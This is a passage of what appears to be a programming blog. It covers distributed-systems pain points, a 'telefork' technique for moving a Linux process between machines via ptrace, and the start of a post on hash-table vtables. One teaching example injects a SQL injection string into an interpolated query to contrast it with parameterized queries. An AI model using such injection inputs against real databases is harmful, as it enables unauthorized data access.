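Here is a toy illustration of shipping a chain of steps in one message. This is not Cap’n Proto’s API: the `Server` class, the operation names and the `("result", i)` reference convention are invented for the sketch. It only shows how letting a later step refer to an earlier step’s result removes a round trip:

```python
class Server:
    """Stand-in for a remote service; each handle() call models one round trip."""

    def __init__(self):
        self.round_trips = 0
        self.ops = {
            "user_id": lambda name: {"alice": 7}[name],
            "profile": lambda user_id: {"id": user_id, "plan": "pro"},
        }

    def handle(self, steps):
        # steps is a list of (op_name, arg). An arg of ("result", i) refers to the
        # output of step i in the same message, so chained calls need no extra trip.
        self.round_trips += 1
        results = []
        for op_name, arg in steps:
            if isinstance(arg, tuple) and arg[0] == "result":
                arg = results[arg[1]]
            results.append(self.ops[op_name](arg))
        return results


# Chained primitive calls: two round trips.
naive = Server()
user_id = naive.handle([("user_id", "alice")])[0]
profile_naive = naive.handle([("profile", user_id)])[0]

# One pipelined message: the second step consumes the first step's result.
piped = Server()
profile_piped = piped.handle([("user_id", "alice"), ("profile", ("result", 0))])[-1]
```

The step language here can only pass results along unchanged, so it has the same kind of limitation as above: anything like adding 1 to a result would need either a new operation on the server or another round trip.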

Another solution that can work in a data center is to use better networking. You can get network cards with 2us latencies and 100Gbps bandwidths or better, but basically only HPC, simulations and finance use them. However these just reduce the constant factor and don’t save you if your approach takes O(n) round trips.

Asynchronous

As soon as you have 2+ sources of events that aren’t synchronized then you start worrying about race conditions. This can be multiple servers, or just a web app with both user input and a channel to the server. There’s always uncommon orderings like the user clicking the “Submit” button a second time before the next page loads. Sometimes you get lucky and the design of your system means that’s fine, other times it’s not and you either fix it to handle that case or get bug reports from customers who were billed twice. The more asynchrony the more cases you have to either think about or solve with an elegant design which precludes bad states.

Depending on your language/framework, asynchrony can also entail a change to the way you normally write code that makes everything bloated and uglier. Lots of systems used to and still do require you to use callbacks everywhere, sometimes without even providing you closures, making your code an enormous mess. Many languages have gotten better at this with features like async/await or coroutines with small stacks like in Go, or just using threads and blocking I/O. Unfortunately some of these solutions introduce function color problems where introducing asynchrony requires making changes throughout your codebase.

Asynchrony edge cases are a reasonably fundamental problem, but there’s lots of available patterns for solving different kinds of asynchrony. Examples include concurrency primitives like locks and barriers, protocol design ideas like idempotency, and fancier things like CRDTs.
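As one example of the idempotency pattern, here is a sketch of a billing endpoint that tolerates the double-clicked “Submit” button. The `BillingService` class and the key format are hypothetical. The client attaches the same key to every retry of one logical request, and the server remembers the first result:

```python
class BillingService:
    """Charges at most once per idempotency key (hypothetical service)."""

    def __init__(self):
        self.charges = []  # every charge actually made
        self.seen = {}     # idempotency key -> receipt from the first attempt

    def submit(self, idempotency_key, customer, cents):
        if idempotency_key in self.seen:
            # Duplicate delivery or double click: return the original receipt.
            return self.seen[idempotency_key]
        receipt = {"charge_no": len(self.charges) + 1, "customer": customer, "cents": cents}
        self.charges.append(receipt)
        self.seen[idempotency_key] = receipt
        return receipt


service = BillingService()
# The client generates the key once per form, so a second click reuses it.
first = service.submit("form-123", "alice", 500)
second = service.submit("form-123", "alice", 500)
```

A real service would also need to expire old keys and handle two requests with the same key arriving concurrently, which this sketch ignores.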

Mismatched

Usually it’s not possible to upgrade every component of a distributed system atomically when you want to change a protocol. This runs from communicating server clusters that must run 24/7 to users who have an old version of your web page loaded in a tab. This means for some time you’ll have systems that want to talk a newer protocol version communicating with systems that only know an older protocol. This is just a problem you need to solve and there’s two broad classes of common solutions with many subtypes:

Have the new software version be able to speak both the old and new protocol version and negotiate to use the new version with upgraded peers, either by maintaining both implementations or mapping the old handlers onto the new ones.
Use data structures that provide some degree of compatibility for free, then only upgrade your protocol in those ways. For example unrecognized fields in JSON objects are usually ignored so can be used for new functionality when recognized. Migrations can usually add new columns to a database table without it breaking queries. Then you usually go to great lengths to shoehorn every change into being this type of compatible.

The problem with both these cases is the first steps usually accumulate technical debt in the form of code paths to handle cases (for example of missing fields) that will never come up once all peers are upgraded past the protocol change. This usually entails multi-stage rollouts, for example introduce a new field as optional, roll out the new version everywhere, change the field to be mandatory now that all clients send it, do another rollout. I’ve definitely spent a lot of time planning multi-stage rollouts when I’ve wanted to change protocols used by multiple systems without leaving a mess.
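A small sketch of the second approach using JSON, with made-up message shapes and function names (`decode_v1`, `decode_v2` and the `priority` field are all hypothetical). The default for the missing field is exactly the kind of code path that becomes dead once every peer is upgraded:

```python
import json


def decode_v2(raw):
    """Decode a message with the v2 handler, accepting v1 senders too."""
    msg = json.loads(raw)
    return {
        "user": msg["user"],
        # "priority" was added in v2. Until every peer is upgraded it has to be
        # optional here; this default is the code path to delete in the last stage.
        "priority": msg.get("priority", "normal"),
    }


def decode_v1(raw):
    """An old peer: reads only the fields it knows and ignores the rest."""
    msg = json.loads(raw)
    return {"user": msg["user"]}


old_message = json.dumps({"user": "alice"})
new_message = json.dumps({"user": "bob", "priority": "high"})

new_reads_old = decode_v2(old_message)
old_reads_new = decode_v1(new_message)
```

Making the field mandatory later means replacing `msg.get("priority", "normal")` with `msg["priority"]` and doing one more rollout.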

There’s lots of things that help with both of these approaches, from serialization systems that provide lots of compatible upgrade paths like Protobufs, to various patterns for deserializing/upgrading old type versions.

Untrusted

Not only can your data fail to arrive but your system can receive data that might actively harm it. Systems have bugs which cause invalid messages to be sent, so inputs need to be carefully validated and errors returned, not only at the serialization level but the business logic level. Bugs or new loads can cause systems to send messages faster than they can be handled, necessitating backpressure and limits. You may even have to defend against attackers who actively try and subvert your system by sending messages that would never be sent by your usual counterparties and intelligently seek out edge cases.

Here too we have lots of patterns including rate limits, field validation logic and channels with built in backpressure. On the security side we also have a field of things like encryption, certificates and fuzzing. We’ve also gotten better at being general here as we’ve reduced prevalence of manual patterns like ensuring we always escape interpolated strings in SQL and HTML, with more general patterns like ? query parameters and templating systems which always apply escaping.
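To show the difference between the manual pattern and `?` query parameters, here is a short example using Python’s built-in `sqlite3` module with an in-memory database. The table and the hostile input are made up for the demonstration:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT)")
conn.executemany("INSERT INTO users VALUES (?)", [("alice",), ("bob",)])

hostile = "nobody' OR '1'='1"

# Manual pattern: interpolation lets the input rewrite the query.
unsafe_rows = conn.execute(
    "SELECT name FROM users WHERE name = '%s'" % hostile
).fetchall()

# General pattern: the ? placeholder always treats the input as a plain value.
safe_rows = conn.execute(
    "SELECT name FROM users WHERE name = ?", (hostile,)
).fetchall()
```

The interpolated query matches every row because the input closes the string literal and adds its own condition, while the parameterized query matches none.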

Pipes

Last and mostly least, everything has to be a stream of bytes or packets of bytes. This means you need to take your nice data structures that your language makes easy to manipulate and pack them into a different form from their in-memory representation in order to send on the wire. Luckily except in very few places easy serialization/RPC libraries have made this pretty easy, if occasionally somewhat slow. You can also sometimes use methods that allow you to pick out exactly the parts you want from the byte buffers without transforming it to a different representation, perhaps by casting your buffer pointer to a C structure pointer (when that’s even close to safe-ish), or using something like Cap’n Proto that can generate accessors.

This is probably the one I’ve spent the least time fighting, but one case I can remember was when I wanted to send a large data structure, but the available serialization system could only serialize it all at once rather than streaming it packet by packet as the socket could accept it, and I didn’t want to block my server for a long time doing the entire thing, creating tail latency. I ended up choosing a different design, but I could also have written custom code to break my data structure up into chunks and send it a little bit at a time.
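The custom chunking approach could look something like this sketch, which assumes the data structure can be expressed as a sequence of records and uses newline-delimited JSON as a stand-in for whatever serialization format is actually in use. The function name and chunk size are illustrative:

```python
import json


def iter_chunks(records, max_chunk_bytes):
    """Yield newline-delimited JSON in pieces of roughly max_chunk_bytes."""
    buf = bytearray()
    for record in records:
        buf += json.dumps(record).encode("utf-8") + b"\n"
        if len(buf) >= max_chunk_bytes:
            yield bytes(buf)
            buf.clear()
    if buf:
        yield bytes(buf)


records = [{"id": i, "payload": "x" * 20} for i in range(100)]
chunks = iter_chunks(records, max_chunk_bytes=256)

# A server loop would send one chunk per iteration and handle other work between.
sent = []
for chunk in chunks:
    sent.append(chunk)  # stand-in for writing the chunk to a socket

decoded = [json.loads(line) for line in b"".join(sent).splitlines()]
```

Because the generator only serializes as much as the next chunk needs, the server never spends long on one client before getting back to its event loop.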

Conclusion

I suspect many responses to this post will be of the form “Actually {some/all of these problems} are trivial if you just {do some thing that isn’t universally applicable, is time consuming or has its own issues, possibly something I mentioned, if so probably using Erlang} and the real problem is that other people are bad at programming unlike people in the good old days”. There are lots of things that help, and there is a skill component in knowing about good solutions, choosing the right ones, and implementing them effectively. However these are still hard problems and people have to make difficult real tradeoffs because we haven’t solved them effectively enough. Maybe you would have taken a different side of the tradeoff but people make these technology decisions for real reasons and we should strive to reduce the costs, as well as improving decisions over which costs we accept.

I just can’t use Erlang for most projects I do because they require either extremely low latency, integration with some part of a non-Erlang ecosystem, or they’re too computationally intensive (yes I know about NIFs). This means there’s ample opportunity for productivity improvements just by bringing solutions from one domain and implementing them in another domain or making them faster! I love seeing efforts to bring Erlang’s benefits to more areas. And even Erlang doesn’t solve all of these problems to the extent I believe it’s possible to one day address them.

I think one of the real biggest hammers you can take to these problems is just to try really hard to avoid writing a distributed system in the first place. One of my goals for this post is to inspire people to try to develop more general solutions instead of having to repeatedly implement specific patterns, but my other goal is to try and put all the costs in your face at once and say are you sure adding that separate networked system will really make your job easier? Sometimes a distributed system is unavoidable, such as if you want extreme availability or computing power, but other times it’s totally avoidable. To pick specific examples:

I think people should be more willing to try and write performance-sensitive code as a (potentially multi-threaded) process on one machine in a fast language if it’ll fit rather than try and distribute a slower implementation over multiple machines. I acknowledge that this takes time and effort to learn how to do and optimize, but it’ll pay off in a simpler system.
- In particular I think people should be more aggressive about trying to use multi-threading on a really big computer when possible. I personally find multi-threaded programming in Rust way easier than parallelizing with multiple processes when it’s viable. Some problems like asynchrony are similar but others like serialization, latency and bandwidth largely go away except at performance levels way higher than you’d probably get out of a hypothetical distributed version.
I think people should be more willing to use C FFI to bind to libraries in other languages rather than putting them in a separate networked service (example picking on users of my own library, although I don’t actually know what their constraints were). Yes you have to learn how to do C FFI and deal with unsafety, but I’d take that trade to avoid the network service.
There are reasons people choose to split things into separate services other than availability and parallelism. For example ability to deploy updates quickly without coordinating with another team, fast CI, using a different language, isolation.
- We should build more alternatives that don’t involve separate systems, like tools for using auto-updating hot-reloaded dynamically linked libraries with sandboxing instead of microservices (eliminating “narrow”, “laggy” and “asynchronous”). I’m pretty sure at least one instance of hot-reloading dylib updates pushed over the network exists (I’d appreciate links!) but we’re far from availability of excellent implementations in many languages and in the mean time it isn’t a viable alternative for most people considering adding a microservice to build this themselves.
- Better tools for continuous integration, continuous deployment, isolation, and monorepos can reduce the incentive to split off services to reduce iteration cycle time.

I follow Jonathan Blow’s Twitter and streams and end up with mixed feelings. On the one hand I resonate with his feeling that modern software is way more complex than it needs to be and like the aesthetic and focus on performance and compile time power embodied in his language. On the other hand when he rants about how modern programmers just don’t know how to do things the Good Old Ways™ and need to stop making terrible design choices to be productive, I can’t help but think back to how I as one person have both been what he considers terribly unproductive working on web systems, and productive and effective when writing fast systems in his preferred style. It’s not that I just made terrible decisions sometimes but not other times, or was unaware of systems programming or data oriented design, it’s that I was facing different tradeoffs that forced me to make a distributed system and face a bunch of unproductive challenges that aren’t fully solved. The distributed systems I work on nowadays are low level, very fast, minimize layers of complexity, and my coworkers are extremely skilled. If anything, I’m less productive per similar-sounding feature when I work on these distributed systems than I was when I was programming in Ruby on Rails, because there’s less available tooling than for Rails. Most of my effort still goes into addressing the same distributed systems problems, which you just have to deal with less when programming a game. I agree with him that it’s totally possible for things to be better and dramatically less complex, but people decide to use established technologies because they don’t have the luxury of taking the time to write their ideal platform from scratch first. That’s why I’m so excited when people like him work to develop new tools like his language. 
I think even if everybody suddenly knew all his favorite game developer skills, more people would have the ability to build new types of tools, but until those tools were built, creating distributed systems would remain hard and unproductive. Also to make sure I tick off Blow fans and haters alike I should say that I recommend watching some of his streams, I think he’s really interesting, skilled and worth listening to, despite his abrasiveness and strong opinions. I find “what about this design would Jonathan Blow yell about being terrible” a good lens to help me come up with interesting alternatives.

Anyhow, I hope this leads you to think about the ways that your work could be more productive if you had better tools to deal with distributed systems, and what those might be. Alternatively I hope it prompts you to seriously consider the costs of writing distributed systems and what you can do to bend all the tradeoffs in your area of the programming world more towards non-distributed systems. Also try to think about what reasons people might not appear to you to be as good at developing software as you are with your Chosen Technology™ and how you can understand the constraints and tradeoffs they are dealing with and what solutions might shift the balance.

Teleforking a process onto a different computer!

2020-04-18T00:00:00+00:00

One day a coworker mentioned that he was thinking about APIs for distributed compute clusters and I jokingly responded “clearly the ideal API would be simply calling telefork() and your process wakes up on every machine of the cluster with the return value being the instance ID”. I ended up captivated by this idea: I couldn’t get over how it was clearly silly, yet way easier than any remote job API I’d seen, and also seemingly not a thing computers could do. I also kind of knew how I could do it, and I already had a good name which is the hardest part of any project, so I got to work.

In one weekend I had a basic prototype, and in another weekend I had a demo where I could telefork a process to a giant VM in the cloud, run a path tracing render job on lots of cores, then telefork the process back, all wrapped in a simple API.

Here’s what the demo video shows: a render running on a 64 core cloud VM in 8 seconds (plus 6s each for the telefork there and back). The same render takes 40s running locally in a container on my laptop.

How is it possible to teleport a process? That’s what this article is here to explain! The basic idea is that at a low level a Linux process has only a few different parts, and for each of them you just need a way to retrieve it from the donor, stream it over the network, and copy it into the cloned process.

You may be thinking, “but wait, how can you replicate [some reasonable thing like a TCP connection]?” Basically I just don’t replicate tricky things so that I could keep it simple, meaning it’s just a fun tech demo you probably shouldn’t use for anything real. It can still teleport a broad class of mostly computational programs though!

What does it look like

I wrote it as a Rust library but in theory you could wrap it in a C API and then use it via FFI bindings to teleport even a Python process. The implementation is only about 500 lines of code (plus 200 lines of comments) and you use it like this:

use telefork::{telefork, TeleforkLocation};

fn main() {
    let args: Vec<String> = std::env::args().collect();
    let destination = args.get(1).expect("expected arg: address of teleserver");

    let mut stream = std::net::TcpStream::connect(destination).unwrap();
    match telefork(&mut stream).unwrap() {
        TeleforkLocation::Child(val) => {
            println!("I teleported to another computer and was passed {}!", val);
        }
        TeleforkLocation::Parent => println!("Done sending!"),
    };
}

I also provide a helper called yoyo that teleforks to a server, executes a closure you give it, then teleforks back. This provides the illusion that you can easily run a snippet of code on a remote server, perhaps one with much more compute power available.

// load the scene locally, this might require loading local scene files to memory
let scene = create_scene();
let mut backbuffer = vec![Vec3::new(0.0, 0.0, 0.0); width * height];
telefork::yoyo(destination, || {
  // do a big ray tracing job on the remote server with many cores!
  render_scene(&scene, width, height, &mut backbuffer);
});
// write out the result to the local file system
save_png_file(width, height, &backbuffer);

Anatomy of a Linux process

Let’s look at what a process on Linux (the OS telefork works on) looks like:

Memory mappings: These specify the ranges of bytes from the space of possible memory addresses that our program is using, composed of “pages” of 4 kilobytes. You can inspect them for a process using the /proc/<pid>/maps file. These contain both all the executable code of our program as well as the data it is working with.
- There are a few different types of these but we can treat these as just ranges of bytes that need to be copied and recreated at the same place (with the exception of some special ones).
Threads: A process can have multiple threads executing simultaneously on the same memory. These have ids and maybe some other state but when they’re paused they’re mainly described by the registers of the processor corresponding to the point of execution. Once we have all the memory copied we can just copy the register contents over into a thread on the destination process and then resume it.
File descriptors: The operating system has a table mapping ordinary integers to special kernel resources. You can do things with these resources by passing those integers to syscalls. There are a whole bunch of different types of resources these file descriptors can point to and some of them like TCP connections can be tricky to clone.
- I just gave up on this part and don’t handle them at all. The only ones that work are stdin/stdout/stderr since those are always mapped to 0, 1 and 2 for you.
- That doesn’t mean it’s not possible to handle them, it just would take some extra work I’ll talk about later.
Miscellaneous: There’s some other miscellaneous pieces of process state that vary in difficulty to replicate and most of the time aren’t important. Examples include the brk heap pointer. Some of these are only possible to restore using weird tricks or special syscalls like PR_SET_MM_MAP that were added by other restoration efforts.

So we can make a basic telefork implementation by just figuring out how to recreate the memory mappings and main thread registers. This should handle simple programs that mostly do computation without interacting with OS resources like files (in a way that needs to be teleported, opening a file on one system and closing it before calling telefork is fine).
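To give a feel for what the memory mappings look like, here is a rough Python sketch that parses the text format of /proc/<pid>/maps. It is not the parser telefork uses: the `Mapping` tuple, the sample lines and the fixed 4096-byte page size are assumptions for illustration.

```python
from collections import namedtuple

Mapping = namedtuple("Mapping", "start end perms offset path")

PAGE_SIZE = 4096  # assumed page size; real code should query it


def parse_maps(text):
    """Parse the text of a /proc/<pid>/maps file into Mapping tuples."""
    mappings = []
    for line in text.splitlines():
        if not line.strip():
            continue
        # Fields: address range, perms, offset, dev, inode, optional pathname.
        fields = line.split(None, 5)
        start, end = (int(part, 16) for part in fields[0].split("-"))
        path = fields[5].strip() if len(fields) > 5 else ""
        mappings.append(Mapping(start, end, fields[1], int(fields[2], 16), path))
    return mappings


# Made-up sample in the same format as the real file.
SAMPLE = """\
00400000-00452000 r-xp 00000000 08:02 173521 /usr/bin/demo
7ffd1a3b0000-7ffd1a3d1000 rw-p 00000000 00:00 0 [stack]
7ffd1a3f6000-7ffd1a3f8000 r-xp 00000000 00:00 0 [vdso]
7f2c10000000-7f2c10021000 rw-p 00000000 00:00 0
"""

maps = parse_maps(SAMPLE)
special = [m.path for m in maps if m.path.startswith("[")]
pages = [(m.end - m.start) // PAGE_SIZE for m in maps]
```

On a Linux machine the same function can be pointed at a live process with `parse_maps(open("/proc/self/maps").read())`.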

How to telefork a process

I wasn’t the first to think of the possibility of recreating a process on another machine. I emailed @rocallahan, the author of the rr record and replay debugger to ask some questions since rr does some very similar things to what I wanted to do. He let me know of the existence of CRIU, which is an existing system that can stream a Linux process to a different system, designed for live migrating containers between hosts. CRIU supports restoring all sorts of file descriptors and other state, however the code was really complex and used lots of syscalls that required special kernel builds or root permissions. Linked from the CRIU wiki page I found DMTCP which was built for snapshotting distributed supercomputer jobs so they could be restarted later, and it had easier to follow code.

These didn’t dissuade me from trying to implement my own system since they’re super complex and require special runners and infrastructure, and I wanted to show how simple a basic teleport can be and make it just a library call. So I read pieces of source code from rr, CRIU, DMTCP, and some ptrace examples, and put together my own telefork procedure. My method works in its own way that’s a hodgepodge of different techniques.

In order to teleport a process, there’s both work that needs to be done in the source process which calls telefork, and at the call to the function which receives a streamed process on the server and recreates it from the stream (telepad). These can happen concurrently, but it’s also possible to do all the serializing before loading, for example by dumping to a file then loading later.

Below is a simplified overview of both processes. If you want to know exactly how everything happens, I encourage you to read the source. It’s heavily commented, all in one file, and ordered so you can read it top to bottom to understand how everything works.

Sending a process using `telefork`

The telefork function is given a writeable stream over which it sends all the state of its process.

Fork the process into a frozen child. It can be hard for a process to inspect its own state since as it inspects the state things like the stack and registers change. We can avoid this by using a normal Unix fork and then have the child stop itself so we can inspect it.
Inspect the memory mappings. This can be done by parsing /proc/<pid>/maps to find out where all the memory maps are. I used the proc_maps crate for this.
Send the info for special kernel maps. Based on what DMTCP does, instead of copying the contents of special kernel maps we remap them, and this is best done before the rest of the mapping so we stream them first without their contents. These special maps like [vdso] are used to make certain syscalls like getting the time faster.
Loop over the other memory maps and stream them to the provided pipe. I first serialize a structure containing info about the mapping and then I loop over the pages in it and use the process_vm_readv syscall to copy memory from the child to a buffer, then write that buffer to the channel.
Send the registers. I use the PTRACE_GETREGS option for the ptrace syscall, which allows me to get all register values of the child process. Then I just write them in a message over the pipe.
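The “header, then pages” streaming step can be sketched as follows. This is not telefork’s actual wire format: the header layout, the permission bits and the function names are hypothetical, and the memory comes from a local byte string rather than from process_vm_readv on a frozen child.

```python
import io
import struct

PAGE_SIZE = 4096
# Hypothetical header: start address, end address, permission bits, little-endian.
HEADER = struct.Struct("<QQI")


def send_mapping(stream, start, perms, data):
    """Write one mapping: a fixed-size header, then its contents page by page."""
    assert len(data) % PAGE_SIZE == 0
    stream.write(HEADER.pack(start, start + len(data), perms))
    for offset in range(0, len(data), PAGE_SIZE):
        # The real sender would read each page from the child; here data is local.
        stream.write(data[offset:offset + PAGE_SIZE])


def recv_mapping(stream):
    """Read back one mapping written by send_mapping."""
    start, end, perms = HEADER.unpack(stream.read(HEADER.size))
    return start, perms, stream.read(end - start)


pipe = io.BytesIO()  # stand-in for the TCP stream
contents = bytes(range(256)) * 32  # two pages of sample memory
send_mapping(pipe, 0x7F0000000000, 0b011, contents)
pipe.seek(0)
received = recv_mapping(pipe)
```

Sending the header first lets the receiver create the mapping at the right address before any page contents arrive.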

Running syscalls in a child process

In order to mold a target process into a copy of the incoming process we’ll need to get the process to execute a bunch of syscalls on itself without having access to any code, because we’ve deleted it all. Here’s how I do remote syscalls using ptrace, which is a versatile syscall for manipulating and inspecting other processes:

Find a syscall instruction. The child needs at least one syscall instruction in an executable mapping that it can execute. Some people patch one in, but instead I use process_vm_readv to read the first page of the kernel [vdso] mapping, which as far as I know contains at least one syscall in all Linux versions so far, and then search through the bytes for its offset. I only do this once and update it when I move the [vdso] mapping.
Set up the registers to execute a syscall using PTRACE_SETREGS. The instruction pointer points to the syscall instruction, rax holds the Linux syscall number, and rdi, rsi, rdx, r10, r8, r9 hold the arguments.
Step the process one instruction using the PTRACE_SINGLESTEP option to execute the syscall instruction.
Read the registers using PTRACE_GETREGS to retrieve the syscall return value and see if it succeeded.
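The data side of these steps can be sketched without touching ptrace at all. The example below searches a made-up code page for the x86-64 `syscall` opcode and builds the register values for a remote munmap. The helper names and the fake page are assumptions, and a real implementation would hand these values to PTRACE_SETREGS rather than keep them in a dict.

```python
SYSCALL_OPCODE = b"\x0f\x05"  # x86-64 encoding of the `syscall` instruction


def find_syscall_offset(page):
    """Return the offset of the first syscall opcode bytes in a page of code."""
    # A plain byte search, so in principle it could match inside another instruction.
    offset = page.find(SYSCALL_OPCODE)
    if offset < 0:
        raise ValueError("no syscall instruction found")
    return offset


def syscall_registers(ip, number, args):
    """Build the register values to load before single-stepping the syscall."""
    arg_regs = ["rdi", "rsi", "rdx", "r10", "r8", "r9"]
    if len(args) > len(arg_regs):
        raise ValueError("x86-64 Linux syscalls take at most 6 arguments")
    regs = {"rip": ip, "rax": number}
    regs.update(zip(arg_regs, args))
    return regs


# A fake code page: some filler bytes, then `syscall; ret`.
fake_vdso = b"\x90" * 0x40 + b"\x0f\x05\xc3" + b"\x90" * 0x10
vdso_base = 0x7FFD1A3F6000

SYS_MUNMAP = 11  # munmap's syscall number on x86-64 Linux
regs = syscall_registers(
    ip=vdso_base + find_syscall_offset(fake_vdso),
    number=SYS_MUNMAP,
    args=[0x400000, 0x52000],
)
```

After the single step, the return value would be read back from rax, where Linux reports errors as small negative numbers.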

Receiving a process using `telepad`

Using this primitive and ones I’ve already described we can recreate the process:

Fork a frozen child. Similar to sending except this time we need a child process we can manipulate to turn it into a clone of the process being streamed in.
Inspect the memory mappings. This time we need to know all the existing memory maps so we can remove them to make room for the incoming process.
Unmap the existing mappings. We loop over each of the mappings and manipulate the child process into calling munmap on them.
Remap the special kernel mappings. Read their destinations from the stream and use mremap to remap them to their target destination.
Stream in the new mappings. Use remote mmap to create the mappings, then process_vm_writev to stream memory pages into them.
Restore the registers. Use PTRACE_SETREGS to restore the registers for the main thread that were sent over, with the exception of rax which is the return value for the raise(SIGSTOP) that the snapshotted process stopped on, which we overwrite with an arbitrary integer passed to telepad.
- The arbitrary value is used so the telefork server can pass the file descriptor of the TCP connection the process came in on, so that it can send data back, or in the case of yoyo execute a telefork back over the same connection.
Restart the process with its brand new contents by using PTRACE_DETACH.

Doing more things properly

There’s a few things that are still broken in my implementation of telefork. I know how to fix them all, but I’m satisfied with how much I’ve implemented and sometimes they’re tricky to fix. This describes a few interesting examples of those things:

Handling the vDSO properly. I mremap the vDSO in the same way that DMTCP does but that turns out to work only when restoring on the exact same kernel build. Copying the vDSO contents instead can work across different builds of the same version, which is how I got my path tracing demo to work since getting the number of CPU cores in glibc checks the current time using the vDSO in order to cache the count. However the way to actually do it properly is to either patch all the vDSO functions to just execute syscall instructions like rr does, or to patch each vDSO function to jump to the vDSO function from the donor process.
Restoring brk and other miscellaneous state. I tried to use a method from DMTCP to restore the brk pointer but it only works if the target brk is greater than the donor’s brk. The correct way to do it that also restores other things is PR_SET_MM_MAP, but that requires elevated permissions and a kernel build flag.
Restoring thread local storage. Thread local storage in Rust seems to just work™ presumably because the FS and GS registers are restored, but there’s apparently some kind of glibc cache of the pid and tid that might mess up a different kind of thread local storage. One solution CRIU can do using fancy namespaces is restore the process with the same PID and TIDs.
Restore some file descriptors. This could be done either using individual strategies for each type of file descriptor, like checking if a file with the same name/contents exists on the destination system, or forwarding all reads/writes to the process source system using FUSE. However it’s a ton of effort to support all the types of file descriptors, like running TCP connections, so DMTCP and CRIU just painstakingly implement the most common types and give up on things like perf_event_open handles.
Handling multiple threads. Normal Unix fork() doesn’t do this, but it should just involve stopping all threads before the memory streaming, then copying their registers and reinstating them in threads in the cloned process.

Even crazier ideas

I think this shows that some crazy things you might have thought weren’t possible can in fact be done given the right low level interfaces. Here’s some ideas extending on the basic telefork ideas that are totally possible to implement, although perhaps only with a very new or patched kernel:

Cluster telefork. The original inspiration for telefork was the idea of streaming a process onto every machine in a compute cluster. You could maybe even use UDP multicast or peer-to-peer techniques to make the distribution of memory to the whole cluster faster. You probably also want to provide communication primitives.
Lazy memory streaming. CRIU submitted patches to the kernel to add something called userfaultfd that can catch page faults and map in new pages more efficiently than SIGSEGV handlers and mmap. This can let you stream in new pages of memory only as they are accessed by the program, allowing you to teleport processes with lower latency since they can start running basically right away.
Remote threads! You could transparently make a process think it was running on a machine with a thousand cores. You could use userfaultfd plus a patch set for userfaultfd write protection which was just merged earlier this month to implement a cache-coherency algorithm like MESI to replicate the process memory across a cluster of machines efficiently such that memory would only need to be transferred when one machine read a page another wrote to since its last read. Then threads are just sets of registers that are very cheap to distribute across machines by swapping them into the registers of pools of kernel threads, and intelligently rearrange so they’re on the same machine as other threads they communicate with. You could even make syscalls work by pausing on syscall instructions, transferring the thread to the original host machine, executing the syscall, then transferring back. This is basically the way your multi-core or multi-socket CPU works except using pages instead of cache lines and the network instead of buses. The same techniques like minimizing sharing between threads that work for multi-core programming would make programs run efficiently here. I think this could actually be very cool, although it might need more kernel support to work seamlessly, but it could allow you to program a distributed cluster the same way you program a many-core machine and (with a bunch of optimization tricks I haven’t yet written about) have it be competitively efficient with the distributed system you otherwise would have written.

Conclusion

I think this stuff is really cool because it’s an instance of one of my favourite techniques, which is diving in to find a lesser-known layer of abstraction that makes something that seems nigh-impossible actually not that much work. Teleporting a computation may seem impossible, or like it would require techniques like serializing all your state, copying a binary executable to the remote machine, and running it there with special command line flags to reload the state. But underneath your favourite programming language there’s a layer of abstraction where you can choose a fairly simple subset of things that make it possible to teleport at least most pure computations in any language in 500 lines of code and a single weekend. I think this kind of diving down often leads to solutions that are simpler and more universal. Another one of my projects like this is Numderline.

Of course, they often seem like extremely cursed hacks and to a large extent they are. They do things in a way nobody expects, and when they break they break at a layer of abstraction they aren’t supposed to break at, like your file descriptors mysteriously disappearing. Sometimes though you can hit the layer of abstraction just right and handle all the cases such that everything is seamless and magic. I think good examples of this are rr (although telefork manages to be cursed enough to segfault it) and cloud VM live migration (basically telefork at the hypervisor layer).

I also like thinking about these things as inspiration for alternative ways computer systems could work. Why are our cluster computing APIs so much more difficult to use than just running a program that broadcasts functions to the cluster? Why is networked systems programming so much harder than multithreaded programming? Sure you can give all sorts of good reasons, but they’re mostly based on how difficult it would be given how other existing systems work. Maybe with the right abstraction or with enough effort a project could seamlessly make it work, it seems fundamentally possible.

Numderline: Grouping digits using OpenType shaping

2019-11-02T00:00:00+00:00

I recently worked on a fun side project to make a font that used font shaping trickery to make it easier to read large numbers by underlining alternating digit groups or inserting fake commas.

I wrote about it on the Jane Street tech blog since I started work there recently and I came up with the idea to help me visually parse tables of latency numbers for my job.

You can read the post here: https://blog.janestreet.com/commas-in-big-numbers-everywhere/

You can also check out the font demo and download site and the GitHub repo for the font patcher.

There’s one other large public technical document I’ve written off of my own site that I might as well link here as well, which is my documentation of how the Xi text editor’s CRDT works. Although it’s written more as documentation than as a generally accessible blog post, you may still find it interesting since it has lots of diagrams. You can read it here.

Shenanigans With Hash Tables

2019-07-29T00:00:00+00:00

One reason to know how your data structures work is so that when your problem has unusual constraints you can tweak how they work to fit the problem better or work faster. In this article I’ll talk about four different fun tweaks to the concept of a hash table that I made in the process of using hash tables to implement interface method lookup vtables in my compilers class Java-subset compiler. The fact that I knew the contents and lookups of all the tables at compile time allowed me to heavily optimize the way the hash table worked at run time until the common case was just indexing an array at a constant offset! Even outside the context of compilers, I think this is an interesting source of inspiration for the ways you can tweak data structures for your purpose.

Background on vtables and interfaces

For object-oriented languages, compilers usually use “vtables” to implement method dispatch. This is when every object has a pointer to an array of function pointers corresponding to the different methods on that object. Each method has a fixed slot, with methods from base classes coming before those added by subclasses, so that an object can be treated as its base class with the same offsets.

The problem is that implementing interfaces is harder since the vtable prefix trick doesn’t work. Java HotSpot implements interface method calls by doing a linear search over a list of “itables” for each interface an object implements, then using inline caching and fancy JIT specialization to speed that up in the common case.

The simpler alternative is to make a giant table of every method signature present in the program (for Java that’s name and parameter types like addNums(int,int)). Each class will have an instance of this table with the slots for methods it implements filled in (including ones inherited from superclasses), and most slots empty. Then for interface dispatch you can just use a fixed offset for the interface method signature: easy and fast. The problem is the size of each table scales with the size of the program, and so does the number of tables, leading to O(n^2) scaling, making this technique non-viable for large programs.
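
As a rough illustration of the giant-table approach, here is a small Python sketch. The class names, signatures and the `dispatch` helper are made up for the example; a real compiler would emit tables of function pointers rather than Python lists.

```python
# Hypothetical program: each class maps method signature -> implementation name.
classes = {
    "Adder": {"addNums(int,int)": "Adder.addNums", "toString()": "Adder.toString"},
    "Logger": {"log(String)": "Logger.log", "toString()": "Logger.toString"},
}

# Assign every signature in the whole program one global slot index.
all_signatures = sorted({sig for methods in classes.values() for sig in methods})
slot_of = {sig: i for i, sig in enumerate(all_signatures)}

# Each class gets a full-width table; slots for methods it lacks stay empty.
tables = {
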